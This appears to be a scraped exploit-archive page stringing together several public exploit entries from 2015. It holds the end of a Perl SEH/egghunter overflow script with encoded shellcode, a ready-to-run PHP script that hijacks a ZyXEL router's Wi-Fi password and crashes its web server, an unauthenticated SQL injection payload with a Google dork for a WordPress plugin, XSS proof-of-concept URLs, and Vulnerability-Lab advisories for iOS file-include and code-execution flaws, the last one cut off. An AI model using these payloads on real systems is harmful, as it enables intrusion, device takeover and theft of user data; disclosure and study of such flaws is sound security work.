"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" . "BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" . "000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" . "MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" . "PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" . "Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" . "S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" . "NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" . "XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" . "JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" . "ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" . "F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" . "OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" . "7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" . "MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" . "112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" . "0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" . "5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" . "PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" . "B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" . "R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" . "3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" . "22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" . "PPP0KPOBB3E0FQXOQOQAA"; my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode; open(myfile,'>QuickSearch_egghunter_messagebox.txt'); print myfile $payload; close(myfile); print "Wrote ".length($payload)." bytes\n";
HireHackking

WordPress Plugin Ultimate Product Catalogue - SQL Injection (1)

HACKER · %s · %s

# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin # Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/" # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : Requested to mitre but not assigned yet # Category: webapps 1. Summary: Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations. Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "Item_ID". 2. Vulnerability timeline: - 22/04/2015: Identified in version 3.1.2 - 22/04/2015: Comunicated to developer company etoilewebdesign.com - 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3 3. Vulnerable code: In file Functions/Process_Ajax.php line 67: [...] $Item_ID = $_POST['Item_ID']; $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID); [...] 3. Proof of concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <wordpress host> [...] Cookie: wordpress_f305[...] Item_ID=2 AND SLEEP(5)&action=record_view 4. Solution: Update to version 3.1.3
HireHackking
<?php /* Exploit Title : ZYXEL remote configuration editor / Web Server DoS Date : 23 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.zyxel.com/ Platform : Hardware Tested On : ZyXEL P-660HN-T1H_IPv6 Firmware Version: 1.02(VLU.0) -------------------------- Unattended remote access -------------------------- ZYXEL Embedded Software does not check Cookies And Credentials on POST method so attackers could changes settings and view pages with post method . -------------------------- DoS Web Server -------------------------- sending empty Post to admin pages will crash internal web server and router needs to hard reset . */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Post($packet,$host) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $host); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; $target = "http://$host/cgi-bin/WLAN_General.asp"; if(strlen(Post($packet,$target)) > 0){ print "Seems Changed !"; }else{ print "Humm , No Chance !"; } //DoS : Post("",$target) ; ?>
HireHackking

JaWiki - 'versionNo' Cross-Site Scripting

HACKER · %s · %s

source: https://www.securityfocus.com/bid/52060/info JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52076/info Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
HireHackking

Wifi Drive Pro 1.2 iOS - Local File Inclusion

HACKER · %s · %s

Document Title: =============== Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1447 Release Date: ============= 2015-03-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1447 Common Vulnerability Scoring System: ==================================== 6.3 Product & Service Introduction: =============================== This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files. Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go. (Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application. Vulnerability Disclosure Timeline: ================================== 2015-03-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Mindspeak Software Product: Wifi Drive Pro - iOS Mobile Web Application 1.2 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] File Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:49276/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: GET http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png PoC: Vulnerable Source <p><a href="..">..</a><br> <a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br> <a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label> <label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p> --- PoC Session Logs [POST] (Inject)--- Status: 200[OK] POST http://localhost:49276/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:49276] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:49276/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------28140821932238 Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png" Content-Type: image/png Reference(s): http://localhost:49276/ http://localhost:49276//%3C./ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks. Security Risk: ============== The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Photo Manager Pro 4.4.0 iOS - Local File Inclusion

HACKER · %s · %s

Document Title: =============== Photo Manager Pro v4.4.0 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1445 Release Date: ============= 2015-03-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1445 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing. Basic Transfer: Import/Export photos from/to the Photos app. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a locla file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Linkus Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or device compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] upload.action Vulnerable Parameter(s): [+] filename Affected Module(s): [+] disp_photo.action Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png PoC: Vulnerable Source <div id="photo_content"> <img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div> --- Poc Session Logs [POST] (Inject) --- Status: 200[OK] POST http://localhost:8080/upload.action?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/upload.html?folderID=5] Cookie[isenabledpasscode=false] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------15932100885119 Content-Disposition: form-data; name="is_submitted" false -----------------------------15932100885119 Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" Content-Type: image/png - Status: 200[OK] GET http://localhost:8080/upload.html?folderID=5 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Cookie[isenabledpasscode=false] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[8085] Date[Do., 05 März 2015 20:52:18 GMT] Reference(s): http://localhost:8080/upload.action?folderID= http://localhost:8080/upload.html?folderID= http://localhost:8080/disp_photo.action?filename= Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Security Risk: ============== The security risk of thelocal file inelcude web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Photo Manager Pro 4.4.0 iOS - Code Execution

HACKER · %s · %s

Document Title: =============== Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1444 Release Date: ============= 2015-03-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1444 Common Vulnerability Scoring System: ==================================== 8.6 Product & Service Introduction: =============================== Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing. Basic Transfer: Import/Export photos from/to the Photos app. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Linkus Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0 Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the target mobile device. The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the `folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code. The input context is becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side. The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6. Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation function or connected module context. Request Method(s): [+] [POST] Vulnerable Module(s): [+] newfolder.action Vulnerable Parameter(s): [+] folderName Affected Module(s): [+] Index (http://localhost:8080) [+] Sub Category Path Proof of Concept (PoC): ======================= The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Create Folder <div id="main"><div id="breadcrumb">Home</div> <div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div> </div> ... after surfing to the created folder <div id="wrapper"> <div id="header"> <div id="title"> <h1>Photo Manager Pro</h1> </div> </div> <div id="main"> <div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div> <form id="download_form" action="download.action" method="post"> <div id="content"><ul></ul></div> </form> </div> PoC: Vulnerable Source } function createFolder() { $.ajax({ type: 'POST', url: 'newfolder.action', cache: false, dataType: 'json', data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')}, async: false, success: function(result) { window.location.reload(false); } }); } </script> --- Poc Session Logs [POST] (Inject) --- Status: 200[OK] POST http://localhost:8080/newfolder.action Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:8080/index.html] Content-Length[50] Cookie[isenabledpasscode=false] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: folderName[*/-CODE EXECUTION VULNERABILITY!;] isSubfolder[0] parentFolderID[0] Response Header: Accept-Ranges[bytes] Content-Length[23] Date[Do., 05 März 2015 20:34:46 GMT] Status: 200[OK] GET http://localhost:8080/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/browse_folder.html?folderID=6] Cookie[isenabledpasscode=false] Connection[keep-alive] Cache-Control[max-age=0] Response Header: Accept-Ranges[bytes] Content-Length[9421] Date[Do., 05 März 2015 20:34:46 GMT] Status: 200[OK] GET http://localhost:8080/javascript/linkus.js Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/index.html] Cookie[isenabledpasscode=false] Connection[keep-alive] Cache-Control[max-age=0] Response Header: Accept-Ranges[bytes] Content-Length[397] Date[Do., 05 März 2015 20:34:46 GMT] Reference(s): http://localhost:8080/index.html http://localhost:8080/newfolder.action http://localhost:8080/index.html#?w=300 http://localhost:8080/browse_folder.html?folderID=5 Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value. Restrict the input and filter the context by usage of a own exception to prevent the application-side code execution. Security Risk: ============== The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php 